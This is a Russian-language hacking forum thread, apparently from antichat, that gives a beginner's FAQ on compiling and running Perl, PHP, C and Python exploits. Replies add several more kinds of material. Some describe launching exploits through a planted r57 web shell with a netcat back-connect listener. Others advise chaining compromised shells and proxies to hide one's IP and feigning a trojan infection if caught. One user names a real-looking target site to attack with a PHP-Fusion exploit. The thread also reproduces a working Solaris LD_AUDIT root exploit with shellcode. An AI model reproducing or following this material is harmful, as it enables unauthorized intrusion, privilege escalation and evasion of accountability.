![]() |
Запускаем сплойты
Скорее это не статья, а небольшой faq по запуску различных сплойтов.
Решил напмсать об этом ибо очень много вопросов на форуме на эту тему. Итак... PERL сплойты Для запуска качаем ActivePerl.устанавливаем. Дальше открываем командну строку (Пуск>Выполнить>cmd) и переходим в папку с сплойтом ("cd папка") дальше пишем "perl sploit.pl" (без ковычек). Вот и всё! Запустицца сплоит и выдаст всю необходимую информацию по его использованию. P.s. Что бы .txt (или любой другой) фаил переименовать в .pl (или в любое другое расширение) можно воспользоваться командой "ren" (в папке с сплойтом "ren sploit.txt sploit.pl") PHP сплойты 1) Качаем PHP (Впринцепе он есть и в Денвере и VertrigoServ можно юзать от туда) Опятьже открываем командну строку (Пуск>Выполнить>cmd) далее пишем "полный_путь_до_php.exe полный_путь_до_sploit.php" (Например: C:\PHP\php.exe C:\sploits\sploit.php) Дальше всё анологично перловым сплойтам. 2) Качаем php2exe от BUG(O)R'a. и php5ts_5_0 или php5ts_5_1 копируем dll'ки из архива в папку с программой и в папку system32 Запускаем... Жамкаем на кнопку "..." и выбираем наш sploit.php Затем жмём "Convert" и выбираем имя (Например: sploit2exe) и место расположение будущего сплойта. Тыкаем "Сохранить" у нас появляется новый фаил (slpoit2exe.exe) Открываем ком. строку переходим в папку где у нас лежит slpoit2exe.exe и просто пишем "slpoit2exe.exe" Запустица сплойт! Си сплойты Качаем lcc-win32 устанавливаем. Копируем сплойт (sploit.c) в папку где находится lcc.exe (C:/icc/bin) Далее запускаем консоль (Пуск->Выполнить->cmd) переходим в папку с эксплойтом и командуем: "lcc.exe sploit.c" в папке появится новый файл: sploit.obj Дальше пишем слудущее: "lcclnk.exe sploit.obj" Теперь в папке появиться файл sploit.exe. Это и есть компиленый сплойт =) Потом открываем ком. строку переходим в папку где у нас лежит slpoit.exe и просто пишем "slpoit.exe" Видео Python сплойты Качаем Python Открываем командну строку (Пуск>Выполнить>cmd) далее пишем: "полный_путь_до_python.exe полный_путь_до_sploit.py" (Например: C:\Python\python.exe C:\sploits\sploit.py) Дальше всё, как у других сплойтов. Metasploit Framework Про этот тип сплойтов есть отличная статья от -=lebed=-'a. Читать тут (c) Вся инфа собрана на просторах этого форума |
Статя норм.)
а вот ссылка http://weloads.com/coding/gen/74434dloadcur.html битая |
Zitt норм статья, теперь кто будет говорить- "А как запустить сплоит я незнаб, скажите плиз а то я ламак" буду давай ссылу на твою статью! Респект!
|
1) Python не качается....
2) Исправь грамматические ошибки... 3) Если я не ошибаюсь, то для запуска файлов созданных программой php2exe от HungeR.ru требуется такая библиотека как php5ts.dll. Скачать php5ts_5_0 - ~1.5 мб. Скачать php5ts_5_1 - ~1.6 мб. Забыл указать... |
Конкретно нечего нового не узнал. Но за старание поставлю +2
|
А теперь мой вариант:
1) Берём r57 шелл, залитый на серв под никсом 2) Качаем NetCat и запускаем (nc -l -p 11457) 3) В r57 шелле нажимаем BackConnet (в настройках ничего не меняем) 4) Загружаем через шелл нужные сплойты 5) В консоли для нужного вбиваем а) для PHP запускаем как php exploit.php б) для Perl запускаем как perl exploit.pl в) для C компилируем (gcc exploit.c -o exploit) и запускаем ./exploit ЗЫ имхо гемора меньше.. но есть некая угроза со стороны серва с шеллом) |
ИМХО статья посредственная!А где сказано о безопасности ?? Вот какойто умник прочитает - и запустит СУПЕР-МЕГА сплоит со своей машины - а в логах серванта его ip и останется - и ждите дядек в погонах...
|
Вот Тоха дело говорит, только Gcc не везде установлен
|
./configure (общая конфигурация)
make make install (установка программы) если експлоит или программа заархивированная, набирай: tar -xvzf pack.tgz (tgz- разрешение архива, которое может меняться к примеру на bgz,gz, точно также как и виндовый zip и rar) dpkg -i имя файла.deb (пакеты Debian) rpm -ivh имя файла.rpm (пакеты rmp) (для С): gcc file.c -o file (скомпилировать файл file.c и получить на выходе бинарник file ) file (параметры) - запуск (для перла): perl file.pl (скомпилить перловский файл) Для того, чтобы его запустить: file.pl (запуск) |
r0cha!
ну есть ещё и cc+) |
Учёл всё выше сказанное. Поправил сцылки, добавил про php.
Sov1et, при чём тут безопасность? Я не о ней писал! Это тема другой статьи |
Отличная статья )
|
Для новичкоф в самый раз!
|
Коротко и просто!
Впредь шлите с такими вопросами... сюда :) |
Статья для новичков просто супер, надеюсь топиков Как запустить експлоит станет меньше. Автору +.
|
О.. наконец-то я научился... )))))))
2Zitt На будущее: Чтобы уйти в корневой каталог используюй cd\ а не cd .. |
Цитата:
|
В плане собственной безопасности удобнее, конечно, сплоиты запускать не со своей машины, а непосредственно с шелла. (читать пост тохи )
Во-первых, при атаке вы спалите айпи серванта, на котором вы запускали сплоит, а не своего домашнего компьютера (особенно если айпи выделеннный - то вас за жабры быстро возьмут). Во-вторых, вы используете бэкконнект, следовательно и доказать, что это вы использовали сплоит будет сложнее (ведь по логам серв сам к вам подключился - можно просто сделать глупое выражение лица и сказать, что не знаете, зачем он к вам постучался на порт). В-третьих, все-таки не нужно заморачиваться и терять время на установку компиляторов и интерпретаторов, на хостингах это все давно есть и ждет вашего внимания. З.ы Никто не пробовал другой безумный способ?: - соединиться к шеллу номер 1 (если файрволл на стороне сервера пропустит прямое соединение - иначе через бэкконнект, но тогда айпишник спалим, хотя доказывать замаются) через sockscap+putty - открыть порт на шелле номер 1 и поставить на режим ожидания неткатом - зайти на веб-шелл (не без прокси ессно) и поставить бэкконнект на шелл номер 1 - работать через шелл номер 1 через путти+сокскап Итого: вроде нигде свой айпишник не палим, да и в цепочке добавлено промежуточное звено, отследить будет куда сложнее. |
.::Gh0st::. - в любом случае надо делать глупое лицо и грить что тя протроянили
|
Молодец.. пригодилоось))
|
вопрос по инструкции
Взял на пробу такой эксплойт: http://forum.antichat.ru/threadnav25249-1-10.html
нашел инструкцию: http://forum.antichat.ru/threadnav26510-1-10.html далее нашел вот это: Usage: php '.$argv[0].' host path OPTIONS host: target server (ip/hostname) path: path to PHPFusion Options: -T[prefix: specify a table prefix (default: fusion_) -p[port]: specify a port other than 80 -P[ip:port]: specify a proxy Examples: php '.$argv[0].' localhost /fusion/ php '.$argv[0].' localhost /fusion/ -p81 php '.$argv[0].' localhost / -P1.1.1.1:80 цель выбрал эту - www.conadsis.com (IP: 70.86.20.18) php у меня на c:\php\php.exe там же и sploit.php пишу по инструкции (cmd): c:\php\php.exe c:\php\sploit.php '.$argv[0].' 70.86.20.18 или c:\php\php.exe c:\php\sploit.php '.$argv[0].' www.conadsis.com получаю какую-то херню ввиде прокрутки текста эксплойта. В чем ошибка? Правильно ли записываю аргументы? Может быт при инсталяции php надо указывать какие-нибудь опции? P.S. Пробую впервые, для спортивного интересу, php и perl не знаю, но, вроде, по написаному ничего сложного нет. |
Такая же проблема, не разобрался с php сплойтом, тже выдаёт весь php код, как же правильно запускать?
|
memo, посмотри внимательнее usage, там не только сайт надо указать, но и папку с /fusion/ т.е. со скриптом, мб в этой трабла? и чё-то меня этот аргумент в чистом виде не вдохновляет)) хотя хз, не юзал)
|
я фигею статья норм для нубов пусть учатся--- но почему статья как запускать сплойты под виндой в ращделе сервера -- динукс --- вопрос на засыпку
|
genom--
Потому что большинство сплойтов ориентировано на *nix-системы, и люди именно в этих ветках и ищут ответы на свои вопросы. |
могу видео снять по установке и запуску предпологаемых експлойтов смотреть будите ?
|
ground_zero
Зачем? Итак ведь все описано и разжевано. |
Во-вторых, вы используете бэкконнект, следовательно и доказать, что это вы использовали сплоит будет сложнее (ведь по логам серв сам к вам подключился - можно просто сделать глупое выражение лица и сказать, что не знаете, зачем он к вам постучался на порт).
Ппц как неактуально - тратишь лишние 50$/месяц - покупаешь VPN от ачата + проксисы (от.... "здесь млга быть Ваша реклама") - и не недо ипацца с логами. PS: нет повести печальнее на свете, тьфу... нет паливнее способа, чем юзать сплоиты со своей машины под любым IP изначально. |
Цитата:
|
Эм... наверное "сильно" тупой вопрос- Как убрать защиту от таких как я(скрипткидис вроде зовется =)), а то на С скачал сплоит... а он не компилируется(это вроде бы так называется =)) =/
|
Цитата:
|
Ок... спасибо =)
|
Цитата:
|
Подскажите плз.
Нашел сплоит для SunOS 5.10, не понимаю как пользаваться. Эт тип PoC код какой-то. atari:venglin:~> cat dupa.c static char sh[] = "\x31\xc0\xeb\x09\x5a\x89\x42\x01\x88\ x42\x06\xeb\x0d\xe8\xf2\xff\xff\xff\x9a\x 01\x01\x01\x01\x07\x01\xc3\x50\xb0\x17\xe 8\xf0\xff\xff\xff\x31\xc0\x68\x2f\x73\x68 \x5f\x68\x2f\x62\x69\x6e\x88\x44\x24\x07\ x89\xe3\x50\x53\x8d\x0c\x24\x8d\x54\x24\x 04\x52\x51\x53\xb0\x0b\xe8\xcb\xff\xff\xf f"; int la_version() { void (*f)(); f = (void*)sh; f(); return 3; } atari:venglin:~> gcc -fPIC -shared -o /tmp/dupa.so dupa.c atari:venglin:~> setenv LD_AUDIT /tmp/dupa.so atari:venglin:~> su # id uid=0(root) gid=10(staff) |
Создаешь файл dupa.c со следующим содержанием:
Код:
static char sh[] =gcc -fPIC -shared -o /tmp/dupa.so dupa.c Собираешь: setenv LD_AUDIT /tmp/dupa.so |
А его обязательно компилить и собирать на удаленой машине или откомпилировать можно у себя?
|
Bac9l
Желательно на удаленной, хотя в некоторых случаях возможно и на локальной (зависит от сплойта). |
1. Linux 2.4.25 SMP
2. Права nobody. Судя по всему, может порутать только uslibpr.c. Собрал, запускаю: ./libr -d 0 [+] SLAB cleanup child 1 VMAs 124 [+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000 [+] vmalloc area 0xe7800000 - 0xffffd000 Wait... - [+] race won maps=211 И так и висит. Вопрос - это нормально, или сплойт повис?:))) P.S. Без параметра -d 0 выплевывает ошибку после Wait. |
Цитата:
|
ground_zero, это во втором случае, если без -d 0. А что с первым?
|
| Время: 19:31 |